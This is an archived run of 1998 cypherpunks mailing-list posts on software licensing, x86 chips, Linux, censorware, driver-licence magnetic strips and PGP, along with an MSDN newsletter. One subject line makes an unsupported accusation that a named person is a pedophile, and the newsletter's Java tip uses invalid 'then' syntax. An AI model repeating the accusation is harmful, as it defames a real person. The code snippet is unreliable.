From: "WebWarrior3@InfoWar.Com" <WebWarrior3@InfoWar.Com>
Date: Mon, 9 Feb 1998 02:39:50 +0800
To: cypherpunks <cypherpunks@sirius.infonex.com>
Subject: RE: SOFT TEMPEST
Message-ID: <34DDEB81.65726105@InfoWar.Com>
MIME-Version: 1.0
Content-Type: text/plain



Several of the servers where I work have multiple monitors.  While it is
rare that I have several instances of the same application being
displayed on these monitors, I do, at times, do just that.  Easier for
cutting and pasting large blocks from one to the other as well as other
editing of code.  So, when the software police pull up outside of my
place of business see that there are six instances of a program being
displayed with one license I can expect a warrant to be issued?  That
would suck.

Unfortunatley, I do not have the time to read through the entire
document at the URL provided, and can't save it either from the .pdf ...
the defensive measures sound interesting.

Also, does this only work with CRTs or can it detect LCD too?

Furthermore, it was written:

>So Markus and I sat down and tried to figure out what we could do for
>the Evil Empire. We concluded that

>(1)  large companies generally pay for their software;

>(2)  if you try to coerce private individuals, the political backlash
>   would be too much;
>so
>(3)  if the Evil Empire is to increase its revenue by cracking down on
>      piracy, the people to go after are medium sized companies.

I have worked on contract with several 'large' companies who are running
illegal copies of software, often without the knowledge of the sys
admin...better check those 'findings.'

Scott R. Brower
http://www.infowar.com
http://www.efflorida.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 9 Feb 1998 02:33:51 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: GNU market penetration...
Message-ID: <199802081837.MAA14861@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

I have a question, after going to the GNU homepage (www.gnu.org) I have not
been able to find out the numbers of how many if any corporate subscribers
and participants to the GNU Foundation. Is there anyone out there who might
have a pointer to this information, or better yet is an actual participant
in the GNU heirarchy and can discuss these and related issues?

Thanks.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 9 Feb 1998 03:03:32 +0800
To: users@ssz.com (SSZ User Mail List)
Subject: New x86 clones & Linus Torvalds (Linux fame)
Message-ID: <199802081857.MAA15107@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://techweb.cmp.com/eet/column1/wintel19.html

>                       HOT X86 CHIPS FOR '98 AND BEYOND
>                                        
>    
>    [INLINE] Launching yet another x86 microprocessor into a field already
>    crowded with clones isn't a good way to bet your company's future. But
>    that's just what two startups and one CPU stalwart are doing, in a bid
>    to beat Intel at its own game.
>    
>    The new ventures--Centaur Technology Inc. (Austin, Texas) and
>    Transmeta Corp. (Santa Clara, Calif.)--and long-time player Advanced
>    Micro Devices Inc. (Sunnyvale, Calif.) each has its own twist on what
>    it will take to survive in the cutthroat x86 world in 1998 and beyond.
>    Let's take them one at a time.
>    
>    Centaur, founded by renowned microprocessor architect Glenn Henry, is
>    focusing on the low end of the market, where sub-$1,000 desktop
>    machines and sub-$2,000 notebooks rule. Centaur's offering, launched
>    only a few months ago, is called the IDT WinChip C6 ("IDT" stands for
>    Integrated Device Technology Inc., which owns Centaur). It's a
>    Pentium-class processor that supports the MMX multimedia
>    instruction-set extensions, a Socket-7 interface, and comes in speed
>    grades of 180-MHz and 200-MHz. Centaur is positioning the C6 as a
>    direct alternative to Intel's Pentium with MMX, AMD's K6, and Cyrix's
>    6x86MX microprocessors.
>    
>    From a design standpoint, what's interesting about the C6 is that
>    Henry chose not to follow the reigning trends in chip architecture.
>    Instead, he took a downsized approach, implementing just those
>    features he needed to deliver decent performance in a high-volume,
>    low-cost CPU.
>    
>    "The biggest thing we did is throw out conventional thinking," Henry
>    told me when we met recently. "We came to the conclusion that the
>    added benefit of a lot of computer-science things wasn't worth the
>    effort. We're not superscalar--we don't do out-of-order execution.
>    Everyone else is designing 4-way superscalar processors, so we did a
>    6-way chip."
>    
>    In designing the C6, Henry said his team found that, as CPU clock
>    speeds approach 200-MHz, nearly half the time is spent waiting on the
>    bus. So, Henry outfitted the C6 with a huge translation-look-aside
>    buffer, as well as a second-level TLB, to reduce bus utilization and
>    cut that wait-time to the bone.
>    
>    Also notable is the fact that Centaur is a tiny outfit that began life
>    a scant two years ago. "Intel would like the world to believe it takes
>    tens of years and dozens of people to design a microprocessor," Henry
>    said. Looking at the results rolling out of Centaur, it's obvious what
>    a dedicated group of engineers can accomplish.
>    
>    Over at AMD, a somewhat larger engineering team is already burning the
>    midnight oil to design the K7 (code-named "Argon"), which will compete
>    with Intel's upcoming 64-bit Merced CPU.
>    
>    AMD has a project team hard at work on K7, but has leaked few details.
>    Publicly, AMD wants to talk more about its new MMX-enhanced K6
>    processors. But K7 will be the key to AMD's long-term future, since a
>    64-bit chip is a must-have for any company that wants to remain a
>    viable alternative to Intel.
>    
>    The few details we do know emerged in October in a keynote speech at
>    the Microprocessor Forum by AMD chairman Jerry Sanders. He said that
>    the K7 will run at clock speeds in excess of 500-MHz and will come in
>    a module that's mechanically--though not electrically--interchangeable
>    with Intel's Slot 1 connector. Most interesting was the news that K7
>    will use the bus protocol developed by Digital Equipment Corp. for its
>    Alpha EV-6 processor.
>    
>    It's not clear how far along AMD is with the K7. Indeed, it will be a
>    daunting task. But AMD has two things going for it in its quest.
>    First, it is very strong in the simulation and verification
>    department--an important factor in avoiding design flaws like the
>    floating-point bug that struck Intel and its Pentium.
>    
>    More important, AMD knows what it's like to wrestle with design
>    delays, which struck its K5 project. Concerns on the K6 job were
>    reportedly behind AMD's decision to purchase NexGen in January, 1996.
>    Indeed, the NexGen team provided the Nx586 core, which became the
>    basis for the K6.
>    
>    The third, and potentially most interesting, effort involves
>    Transmeta, a startup formed less than three years ago by former Sun
>    Microsystems chip architect David Ditzel. Initial word had Transmeta
>    at work on a PowerPC clone. Then, the buzz was that the company was
>    designing a Java chip aimed at the nascent market for low-cost network
>    computers. Now, it seems that Transmeta's effort is focused more on an
>    x86 alternative that boasts either low-power, multimedia or
>    network-computer capabilities. Or perhaps all three.
>    
>    One interesting tidbit to emerge from Transmeta is the news that it
>    has hired Linus Torvalds, the designer of the Linux operating system.
>    Apart from Torvalds' considerable software skills, he's plugged into
>    an influential community of Unix programmers, which could give
>    Transmeta a big leg up in any effort to design a processor tuned to
>    handle real-world networked applications.
>    
>    Alexander Wolfe is EE Times' Managing Editor for computers and
>    communications


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 9 Feb 1998 03:37:05 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Another Linus market observation... (fwd)
Message-ID: <199802081936.NAA15377@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: Another Linus market observation...
> From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
> Date: Sun, 08 Feb 98 13:38:30 EST

> Jim Choate <ravage@ssz.com> writes:
> > monthly magazines. Linux has a roughly 6M user market penetration yet there
> > is only a single Linux specific magazine available. ...
> 
> I disagree.  There are plenty of printed publications about the hardware
> that Linux runs on (i.e. Intel and compatible boxes) (not that I read them).
> There are also rags about Unix, which are almost entirely applicable to Linux.

The problem with this interpretation of the market is that AmigaWorld, Info,
Compute!, etc. didn't cover the hardware to that great a degree. What they
did do was discuss the programming and applications of those machines to
problem solving, education, programming, etc.

This point isn't the hardware and it isn't selling magazines on related os's
that can be applied to Linux because of its similarity. The issue *is*
increasing Linux' market share, magazines that discuss issue about AIX or
HP/UX that can be applied to Linux don't do that.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 9 Feb 1998 03:38:08 +0800
To: cypherpunks@toad.com
Subject: Guy Polis is a pedophile
In-Reply-To: <199802081713.LAA09053@harper.uchicago.edu>
Message-ID: <wwiLke2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Veral <veral@geocities.com> writes:

> CAn I join?

No.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 9 Feb 1998 03:37:34 +0800
To: cypherpunks@toad.com
Subject: Re: Another Linus market observation...
In-Reply-To: <199802081806.MAA14516@einstein.ssz.com>
Message-ID: <VyiLke3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate <ravage@ssz.com> writes:
> monthly magazines. Linux has a roughly 6M user market penetration yet there
> is only a single Linux specific magazine available. ...

I disagree.  There are plenty of printed publications about the hardware
that Linux runs on (i.e. Intel and compatible boxes) (not that I read them).
There are also rags about Unix, which are almost entirely applicable to Linux.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MSDNFlash Editor <MSDNFlashEditor_001527@Newswire.Microsoft.com>
Date: Mon, 9 Feb 1998 06:07:26 +0800
To: "'cypherpunks@toad.com>
Subject: MSDNFlash, Volume 2, Number 3, February 9, 1998
Message-ID: <837CDED67A3AD111B59200805F3118C1087401C7@bulkengine.dns.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain



*** MSDN Flash ***

A Twice-Monthly Newsletter for the Microsoft Developer Community

Visit us today on the World Wide Web at:
http://www.microsoft.com/msdn/

In this issue:

PRODUCT AND TECHNOLOGY NEWS 
*Customers Choose Visual Studio
*VBA PowerTools
*New MSDN Online Feature - HelpDesk Code Sample
*Dr. GUI on COM
*XML-Data Submission to the W3C
*Visual FoxPro Migration Sourcebook CD

RESOURCES
*MSDN Subscription January Release
*Chat About MSDN Subscription
*MSDN Online Member Downloads
*New Chapter from Microsoft Mastering Series
*Download Windows CE 2.0 Platform SDK
*MSDN Online Membership Kit
*J/Direct Jump Start Reviewers Guide
*Learn Visual Basic Scripting Edition Now

EVENTS
*Windows DNA Development Lab
*XML Conference
*VBITS 
*Windows CE Developer Conference
*Visual C++ Developer Conference
*Visual J++ Developer Conference
*Visual Foxpro Devcon 98
*Microsoft TechEd
*Developer Events - United States
*Developer Events - Europe

MSDN FLASH TIP OF THE WEEK
*Visual J++ Developer's Journal
=================================================
PRODUCT AND TECHNOLOGY NEWS
=================================================
CUSTOMERS CHOOSE VISUAL STUDIO
Microsoft Visual Studio 97 is being widely adopted by enterprise
customers, partners, and solution providers for building
mission-critical business applications addressing a wide variety of
scenarios and architectural challenges. Visit 
http://www.microsoft.com/vstudio/
to read case studies and customer testimonials.

VBA POWERTOOLS
If you're learning how to build VBA components for applications such as
Word or Excel, the new VBA PowerTools series offers add-ins to install
and examine, like a popup thesaurus. Download a dozen of them from
http://www.microsoft.com/vba/vbapowertools.htm

NEW MSDN ONLINE FEATURE - HELPDESK CODE SAMPLE
Check out the new MSDN Feature package this month-the HelpDesk, an
extensive sample intranet application with 24,000 lines of source code.
Find out more about the package at
http://www.microsoft.com/msdn/news/feature/020298/default.htm

DR. GUI ON COM
Check out Dr. GUI's COM column-a step-by-step, week-by-week guide to
learning about components, COM and the Active Template Library.
Visit http://www.microsoft.com/news/drgui/020298.htm

XML-DATA SUBMISSION TO THE W3C
The W3C acknowledged the XML-Data submission from Microsoft, ArborText,
DataChannel and Inso.  The joint submission outlines a richer method for
describing and validating data - the goal is to make XML more powerful
for integrating data from multiple, disparate sources, and building
3-tier web applications.  The submission is available for public review
from
http://www.microsoft.com/standards/xml/

VISUAL FOXPRO MIGRATION SOURCEBOOK CD 
This free interactive guide is designed to make upgrading to Visual
FoxPro 5.0 easier, addressing the two biggest concerns developers have
when upgrading: The learning curve and the operating system. There is
plenty of in-depth information on everything from Visual FoxPro's
features to using Visual FoxPro to build client/server and Internet
applications. For ordering information visit
http://www.microsoft.com/vfoxpro/

=================================================
RESOURCES
=================================================
MSDN SUBSCRIPTION JANUARY RELEASE
The MSDN Subscription January Shipment includes Windows 98 beta 3,
Windows NT(r) Option Pack 4.0, Windows NT DDK (for Windows NT Workstation
5.0 beta 1, Microsoft SQL Server Enterprise Edition, and Visual Studio
Service Packs (Alpha).  For complete interim details or a full listing
of all MSDN subscription components, visit
http://www.microsoft.com/msdn/services/subscription/index/

CHAT ABOUT MSDN SUBSCRIPTION
Join us for a discussion about MSDN Subscriptions on Tuesday, February
17. 11:00 am - noon, PST. Chat about Library content, quarterly and
interim shipments, licensing, and other subscriber benefits. If you
can't make the chat but have a great question, please submit it to
msdn@microsoft.com with "MSDN Chat" as the subject line. We'll post a
transcript two days after the chat. For more information visit
http://www.microsoft.com/msdn/newsgroups/chats.htm

MSDN ONLINE MEMBER DOWNLOADS
Check out this week's free downloads for Online Members: TeeChart Pro
ActiveX from TeeMach is a charting and graphing ActiveX control. Also
try Soffront TRACK - a customizable defect-tracking and
technical-support database. For more information visit 
http://www.microsoft.com/windowsce/developer/download/

NEW CHAPTER FROM MICROSOFT MASTERING SERIES 
This month check out Creating ActiveX Code Components, Chapter 7 from
Mastering Microsoft Visual Basic 5. Gain the skills you need to become
an expert in database programming and ActiveX component creation.
Available online and as a download. For more information visit 
http://www.microsoft.com/msdn/training/mastering.htm

DOWNLOAD MICROSOFT WINDOWS CE 2.0 PLATFORM SDK
If you're developing for Windows CE 2.0 you'll want to download the
Windows CE 2.0 platform SDK. Visit
http://www.microsoft.com/windowsce/developer/download/
for more information.

MSDN ONLINE MEMBERSHIP KIT
Sign up now to get your MSDN Online Membership Kit. Members in the US
and Canada will start receiving the kit in February. The kit includes
the Component Source CD, which includes 500 ActiveX controls and over
1200 software components and tools, including products from APEX
Software Corporation, Distinct Corporation, Phantom Reality, and Spatial
Technology. It also features discounts on books and magazines including
PC Magazine, Microsoft Systems Journal, Inside Visual Basic, Computer
Shopper, Visual J++ Developer's Journal, and featured books from Wrox
Press and Microsoft Press. Not to mention rebates on MSDN Professional
and Universal subscriptions. For more information visit
http://www.microsoft.com/msdn/join/

J/DIRECT JUMPSTART REVIEWERS GUIDE
The J/Direct Jumpstart Reviewers Guide discusses developing powerful
Windows applications in Java.  This guide provides introductory
information on both J/Direct and J/Direct Jumpstart, including a
description of the code samples and other materials designed to help
familiarize developers with the basic concepts of programming with
J/Direct. For more information visit
http://www.microsoft.com/visualj/

LEARN MICROSOFT VISUAL BASIC SCRIPTING EDITION NOW
Check out this sample chapter from the Microsoft Press book, LEARN
MICROSOFT VISUAL BASIC SCRIPTING EDITION NOW, which explains the basics
of the VB scripting language. Visit 
http://mspress.microsoft.com/prod/books/sampchap/364.htm

=================================================
EVENTS
=================================================
MICROSOFT DNA DEVELOPMENT LAB
A DNA Development Lab has been established for teams needing assistance
in moving their applications to Internet architectures. Corporate
development teams can bring their projects into the Lab, an intensive
5-day knowledge-transfer "boot camp", and get assistance in architecting
and implementing their solutions. The lab is a partnership between
Microsoft, CoreTech Consulting Group and Hewlett Packard. This
environment is ideal for proof-of-concept, porting, and startup
projects. More information is available at
http://www.coretech-group.com
and
http://www.microsoft.com/usa/mid-atlantic/

XML CONFERENCE
March 23-27, Seattle, WA
XML, eXtensible Markup Language, describes structured data and delivers
the data the way you want it.  Come to XML the Conference, and select
from the Business, Technical, E-Commerce, Print Media, and Content
Management Tracks. See tools that support XML today and those planned
for tomorrow.  For registration and additional information visit 
http://www.gca.org/

VBITS SAN FRANCISCO '98
March 23-27, San Francisco, CA
VBITS brings Microsoft and independent speakers together to give
in-depth, hands-on training on topics ranging from multithreading
applications and servers, to leveraging component-based solutions to the
Internet or intranet, to deploying N-tier Client/Server apps with MTS.
Visit
http://www.windx.com/vbits/
for more information.

REGISTER NOW FOR THE WINDOWS CE DEVELOPERS CONFERENCE
April 5-8, San Jose, CA
In-depth technical sessions will teach you all you need to know about
the latest advances in Windows CE-based devices. Anyone writing software
for Windows 95 or Windows NT will want to come hear how they can
leverage their existing Win32 skills into this area. Attendees will
receive a complimentary Palm PC - so you can start developing cool
applications right away. For more information or to register visit
http://www.microsoft.com/events/windowsce/

MICROSOFT VISUAL C++ DEVELOPER CONFERENCE IV
April 15-17, Boston, MA
TPD Publishing and Microsoft are holding the fourth Visual C++
Developers Conference: three days of intense technical instruction with
Microsoft product gurus and third-party speakers and authors. Come learn
about COM and DCOM, MFC and ATL, MTS, hardcore Visual C++, and more. For
more information
Visit http://www.vcdj.com/

VISUAL J++ DEVELOPER CONFERENCE
April 27-30, Los Angeles, CA
Informant Communications Group, Inc. and Microsoft have announced the
first Microsoft Visual J++ Developer Conference and Exposition. A
technical forum on advanced Java development using Microsoft Visual J++,
this event features four tracks and 48 sessions. For more information
visit
http://www.javaconference.com/

VISUAL FOXPRO DEVCON 98
May 17-20, Orlando, FL
Come learn all about Tahoe, the next version of Microsoft Visual FoxPro.
Presented by MSDN and FoxPro Advisor Magazine, this is the ultimate
developer conference for Visual FoxPro developers. Join thousands of
professionals from around the world and be among the first to get an
in-depth look at Tahoe. For more information visit the Visual FoxPro Web
site at
http://www.microsoft.com/vfoxpro/

MICROSOFT TECHED 98
June 1-4, New Orleans, LA
This is the definitive technical conference for building complete
solutions with Microsoft technologies. Register now for the event that
always sells out. For more information visit
http://www.microsoft.com/events/teched/

MICROSOFT TECHED EUROPE 98
7-10th July, Nice Acropolis Convention Centre, France
Book Now! For more information visit 
http://www.eu.microsoft.com/europe/teched/

DEVELOPER EVENTS - UNITED STATES
EMERGING TECHNOLOGY SERIES
The Emerging Technology Series hits Missouri, Kansas, and Tennessee in
February and March with a six-city tour. This free one-day seminar
includes sessions on "Developing Multi-tiered Applications with Visual
Studio" and "Write Once, Run Everywhere? Alternatives to Cross Platform
Application Development". For more information, visit
http://www.microsoft.com/stlouis/ets/

BOB AND LARRY'S DEVELOPER WORKSHOP SERIES
February 12, Waltham, MA 
February 17, Farmington, CT
Learn how to deliver solutions faster, cheaper and easier. For more
information on this free monthly series or to register head to
http://www.microsoft.com/usa/newengland/developer/

MICROSOFT PROFESSIONAL DEVELOPERS SUMMIT
The PDS hits the West Coast in February with a seven-city tour. This
one-day seminar will focus on the Windows Distributed interNet
Applications Architecture and the new capabilities of the Windows
platform. For more information and to register visit
http://www.microsoft.com/usa/pdswest/

TURNING DATA INTO INFORMATION
Learn how to leverage desktop productivity tools, Internet technologies,
universal data access and SQL Server in a building framework for
effective data marts at a lower cost. For more information visit 
http://www.microsoft.com/usa/mid-atlantic/developer/

DEVELOPER EVENTS - EUROPE
MICROSOFT SQL SERVER AND UNIVERSAL DATA ACCCESS TECHNICAL CONFERENCE
March 25 - 26th Paris, 
March 30 - 31st Stockholm, 
April 2 - 3rd Frankfurt, 
April 6 - 7th London 1998.  
For more information visit
http://www.eu.microsoft.com/europe/msdn/events/sql/

MICROSOFT WEB SOLUTIONS DEVCON
February 16, Munich
February 18, Dusseldorf
March 3, Frankfurt
The one day 2 track technical conference will cover the development,
deployment and administration of web solutions built with Microsoft
technologies. A pre-conference the day before will focus on component
development with either VC++, VJ++ or VB. For more information visit
http://microsoft.eusoft.com

================================================= 
MSDN Flash TIP
================================================= 
BE CAREFUL WHEN COMPARING STRINGS
from Visual J++ Developer's Journal

Java allows you to compare two String objects, strng1 and strng2 using
the following code:

  if(strng1 == strng2) then
  ...

Unfortunately, the effect may not be what you want. The code above
actually compares the String locations, not their text value. To compare
the text values, use this:

  if(strng1.equals(strng2)) then
  ...

MSDN Online Members - we have a new Tip for you each week at
http://www.microsoft.com/msdn. For a free issue of Visual J++
Developer's Journal visit
http://www.cobb.com/vjp/freevyer.htm

To receive the Visual J++ Developer's Journal Tip of the Week in email,
visit Visual J++ tip sign-up:
http://www.zdtips.com/vjp/msd-f.htm

=================================================
HOW TO JOIN THE MAILING LIST:

You received this e-mail newsletter as a result of your registration on
the Microsoft Personal Information Center. You may unsubscribe from this
newsletter, or subscribe to a variety of other informative newsletters,
by returning to the Personal Information Center,
http://register.microsoft.com/regwiz/personalinfo.asp and changing your
subscription preferences. 

Alternatively, please send a reply to this e-mail with the word
"unsubscribe" as the first line in the body of the message.
=================================================
The information provided is for informational purposes only and
Microsoft Corporation and its suppliers make no warranties, either
express or implied, as to the accuracy of such information or its
fitness to be used for your particular purpose.  The entire risk of the
use of, or the results from the use of this information remains with
you.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Mon, 9 Feb 1998 04:06:34 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Driver Licenses
In-Reply-To: <19980208194501.10692.qmail@nsm.htp.org>
Message-ID: <199802082027.PAA00347@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <19980208194501.10692.qmail@nsm.htp.org>, on 02/08/98 
   at 07:45 PM, Anonymous <remailer@htp.org> said:

>Recently had to renew my DL here in Florida. While we are not forced to
>give up our fingerprints (yet)we have a new little magnetic strip similar
>to those on a credit card or ATM card and I can see this as a way for the
>State to start holding more and more data about us on these I.D.'s (like
>fingerprints, criminal records, etc...  Coincidentally, that day when I
>went into my grocery store to get a six pack of brew, I got carded.  I
>handed my new little card over and the teller and rather than looking at
>my date of birth she started to swipe the damn thing through her credit
>card reader machine!  I stopped her, grabbed my DL back and told her to
>manually enter the date as they have always done.  When she explained
>that it is against store policy and that she 'had' to swipe any IDs that
>had the strip I got my keys outta my pocket and all but removed the strip
>from the back of my little nemesis. Handed it back to her and told her to
>swipe away; it is against MY policy to provid!
> e !
>!
>the store with my address. I don't want any damn pepsi coupons mailed to
>me each time I buy coke, or northern tissue coupons when I buy charmin.
>Nor do I want the store collecting information on how much beer I buy.

>Sure, I want my alchohol purchases going to the Dept of Motor Vehicles
>and the other State departments...like hell.

>My question is, how much information can be stored on these strips?

My question is what is the best way to remove this information from the
cards?

A few passes over a strong magnet sufficient or should a chemical solvent
be used?


- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: I'm an OS/2 developer...I don't NEED a life!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNN4BX49Co1n+aLhhAQHVkQQAmJ3D8E7bu7FUZRT7EU1YSXEsZtiP81fB
nz3VNExa7D5Ctdz/2qmfnwiQY7S9yI0UUxfkkDdWJcYhQc45NFMghP+lcwz6x+cX
3KKmBob0Gf1gt62HkttyH/w5+yW0Sxo6CZYeRWQob8e22BjgvZ3N2kFlIEELwtB8
7hB+C8T5aiQ=
=iUxA
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Mon, 9 Feb 1998 05:02:16 +0800
To: ravage@ssz.com (Jim Choate)
Subject: Re: GNU market penetration...
In-Reply-To: <199802081837.MAA14861@einstein.ssz.com>
Message-ID: <199802082043.OAA16928@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Jim Choate wrote:
> I have a question, after going to the GNU homepage (www.gnu.org) I have not
> been able to find out the numbers of how many if any corporate subscribers
> and participants to the GNU Foundation. Is there anyone out there who might
> have a pointer to this information, or better yet is an actual participant
> in the GNU heirarchy and can discuss these and related issues?

Jim,

The number of subscribers bears almost no relation to the number of users.

	- Igor.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 9 Feb 1998 07:24:28 +0800
To: declan@well.com
Subject: Re: rec.guns et.al. blocked by censorware
In-Reply-To: <6bla0o$4ad@xring.cs.umd.edu>
Message-ID: <v03102801b103ed5a2019@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:02 PM -0800 2/8/98, Igor Chudov @ home wrote:
>In rec.guns, Dan <ywq@wco.com> wrote:
>* I guess I should not be surprised but blocking software Cyber Patrol
>apparently
>* blocks rec.guns and rec.hunting because we are militant extremists, advocate
>* violence and swear.   The whole story starts at:
>* http://www.spectacle.org/cwp/index.html
>* You have to keep going until you get to newsgroups.

>Examples of HUNDREDS of blocked newsgroups:
>
>rec.games.mecha Giant robot games. (Moderated) Quest/Illegal/Gamble
>Violence/Profanity Intol
>news.groups             Discussions and lists of newsgroups. Intol
>news.groups.questions   Where can I find talk about topic X? Intol
>rec.guns Discussions about firearms. (Moderated) Militant/Extreme
>Violence/Profanity


Interestingly, rec.guns is moderated (not that I like that), and there is
virtually no profanity or discussion of anything remotely of a sexual
nature. The discussion is on-topic, about revolvers, rifles, ammunition,
target shooting, defense methods, etc.

That the "cyber nannies" are blocking it (and other similarly nonsexual,
nonprofane newsgroups) is exactly what was expected. These cyber nannies
become tools for political correctness.

Perhaps the strategy should be to post material to other newsgroups to get
them blocked as well. (Though I expect the blocking is not being done using
robots to monitor for illegal words, as rec.guns would not have been
blocked this way. Rather, the cyber nannies are probably using their "PC
judgment" to block groups they don't like.

--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Tu <ATU5713@compuserve.com>
Date: Mon, 9 Feb 1998 04:38:33 +0800
To: Cypher Punks Mailing List <cypherpunks@toad.com>
Subject: Latest in Factoring
Message-ID: <199802081525_MC2-3277-70EE@compuserve.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Lawrence wrote:

>>>>>
Well, my opinion is only one of many, but I just finished installing
PGP 5.5 and it allows both RSA keys (max of 2048) as
well as DS/DHH keys (max of 4096).  Most keys I'm seeing these days
are running at 2048, so 1024 could be considered as
"below average".  Just my $0.02
<<<<<


First, I do have a 2048 RSA key I generated with 2.6.3ix, but its in
hibernation and not on a key server, yet. (g)

Second, what is 5.5 compared to 5.0?  Let alone 5.5.3 as displayed in your
key block?  Third, I think its arrogant that PGP Inc. (and many many other
software companies) have left dos/win 3.x users behind.  The people, like
me, who still use DOS/Win 3.x obviously like it, not to mention people not
in the USA.

Then, because of the lack of conventional encryption, and other options not
in pgp 5.0 (I don't know about 5.5), and because its not freeware (freeware
doesn't fully support RSA), people on the Internet had reached the
concensus that they weren't going to stop using pgp 2.6.xxxx.  When I
complained about 5.0, one person asked me if my 2.6.3ix version had stopped
working.  Anyway, I think that PGP Inc. should release a version of PGP for
DOS that lets you generate longer keys, be it RSA or otherwise.

Finally, there are a lot of people in other countries (where PGP has spread
as widely as in the US, if not more so) who are not compatible with Win95
users using PGP 5.0 freeware.

--Alan Tu

Type Bits/KeyID    Date       User ID
pub  1024/E5D915E1 1997/04/27 Alan Tu <atu5713@compuserve.com>
                              Alan Tu <102534.2165@compuserve.com>

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i
Comment: Requires PGP version 2.6 or later.

mQCNAzNivkwAAAEEALdGUXD3j+RioIirVG46N6LaGD3YMMVVT5Mjwr5JojQsDICy
856I06Ugo/Fqid2A/os7v/gwE+Sj/WhMERgTsTejUZtsucTpS9sae+cc27Fjjq1l
hOnqcLZqnHDDNyn3+jesVFPLnRlSoHbmcBK1XDW/SJT1anZz55ezmBrl2RXhAAUR
tCBBbGFuIFR1IDxhdHU1NzEzQGNvbXB1c2VydmUuY29tPokAlQIFEDOguk6Xs5ga
5dkV4QEBBF8D/1B0ePqlMavWEUMP0uTmyvWFI7jooAcih6uHZFo2u+u3EzE2Is8X
EoLHg39DhjleTHPu6TnGsWIiwDYEslzYeVw/Cglx6eliYIr/qs7peEywuhtZsEFH
